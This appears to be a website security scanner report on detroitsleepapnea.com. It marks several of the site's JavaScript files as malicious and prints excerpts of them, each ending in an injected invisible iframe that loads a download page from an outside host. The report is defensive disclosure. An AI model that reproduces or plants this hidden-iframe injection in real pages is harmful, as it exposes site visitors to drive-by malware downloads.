Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=detroitsleepapnea.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://detroitsleepapnea.com/ | 200 OK Content-Length: 36564 Content-Type: text/html | clean |
http://www.page1forms.com/jquery/jquery.js | 200 OK Content-Length: 55807 Content-Type: text/javascript | clean |
http://www.page1forms.com/page1forms.js | 200 OK Content-Length: 20850 Content-Type: text/javascript | clean |
http://www.google.com/jsapi?key=AIzaSyDCV9yMmGrhl1w3kFBQLANM4f4tO5K8e3k | 200 OK Content-Length: 24580 Content-Type: text/javascript | clean |
http://detroitsleepapnea.com/javascripts/googlerss.js | 200 OK Content-Length: 2238 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) google.load("feeds", "1") function rssdisplayer(divid, url, feedlimit, showoptions){ this.showoptions=showoptions || "" var feedpointer=new google.feeds.Feed(url) feedpointer.setNumEntries(feedlimit) document.write('<div id="'+divid+'">Loading feed...</div>') this.feedcontainer=document.getElementById(divid) var displayer=this feedpointer.load(function(r){displayer.formatoutput(r)}) } rssdisplayer.prototype.formatdate=funct document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://detroitsleepapnea.com/javascripts/prototype.js | 200 OK Content-Length: 96824 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype = { Version: '1.5.1.1', Browser: { IE: !!(window.attachEvent && !window.opera), Opera: !!window.opera, WebKit: navigator.userAgent.indexOf('AppleWebKit/index.html') > -1, Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1 }, BrowserFeatures: { XPath: !!document.evaluate, ElementExtensions: !!window.HTMLElement, SpecificElementExtens document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://detroitsleepapnea.com/javascripts/effects.js | 200 OK Content-Length: 38721 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) String.prototype.parseColor = function() { var color = '#'; if(this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if(this.slice(0,1) == '#') { if(this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if(this.length==7) color = this.toLowerCase(); } document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://detroitsleepapnea.com/javascripts/glider.js | 200 OK Content-Length: 4581 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Glider = Class.create(); Object.extend(Object.extend(Glider.prototype, Abstract.prototype), { initialize: function(wrapper, options){ this.scrolling = false; this.wrapper = $(wrapper); this.scroller = this.wrapper.down('div.scroller'); this.sections = this.wrapper.getElementsBySelector('div.section'); this.options = Object.extend({ duration: 1.0, frequency: 3 }, options || {}); this.sections.each( function(section, index) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://detroitsleepapnea.com/javascripts/lib.js | 200 OK Content-Length: 8325 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function clearText(thefield) { if (thefield.defaultValue==thefield.value) { thefield.value = "" } } function replaceText(thefield) { if (thefield.value=="") { thefield.value = thefield.defaultValue } } function bnaOpen() { new Effect.Appear('closeBNA',{delay:.4}); new Effect.Fade('openBNA',{duration:.3}); new Effect.Appear('viewMoreBnA',{delay:.4}); new Effect.Fade('toggleBnA',{duration:.3}); new Effect.toggle('bnaHolder','blind' document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://detroitsleepapnea.com/javascripts/lightbox.js | 200 OK Content-Length: 24330 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var fileLoadingImage = "images/loading.gif"; var fileBottomNavCloseImage = "images/closelabel.gif"; var overlayOpacity = 0.8; var animate = true; var resizeSpeed = 7; var borderSize = 10; var imageArray = new Array; var activeImage; if(animate == true){ overlayDuration = 0.2; if(resizeSpeed > 10){ resizeSpeed = 10;} if(resizeSpeed < 1){ resizeSpeed = 1;} resizeDuration = (11 - resizeSpeed) * 0.15; } else { overlayDuration = 0;< document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://detroitsleepapnea.com/javascripts/swfobject.js | 200 OK Content-Length: 7377 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://detroitsleepapnea.com/javascripts/swfobject-ext.js | 200 OK Content-Length: 747 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function sendEvent(typ,prm) { var movie = thisMovie("mpl") movie.sendEvent(typ,prm); }; function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1) { return window[movieName]; } else { return document[movieName]; } }; document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>'); document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://detroitsleepapnea.com/images/bna/d_josie.jpg | 200 OK Content-Length: 66539 Content-Type: image/jpeg | clean |
http://detroitsleepapnea.com/test404page.js | 404 Not Found Content-Length: 402 Content-Type: text/html | clean |
http://detroitsleepapnea.com/images/bna/d_larryh.jpg | 200 OK Content-Length: 63764 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: detroitsleepapnea.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 01:19:03 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 36564
Content-Type: text/html
...36564 bytes of data.
GET / HTTP/1.1
Host: detroitsleepapnea.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 01:19:03 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 36564
Content-Type: text/html
...36564 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: detroitsleepapnea.com
Referer: http://www.google.com/search?q=detroitsleepapnea.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: detroitsleepapnea.com
Referer: http://www.google.com/search?q=detroitsleepapnea.com
Result:
The result is similar to the first query. There are no suspicious redirects found.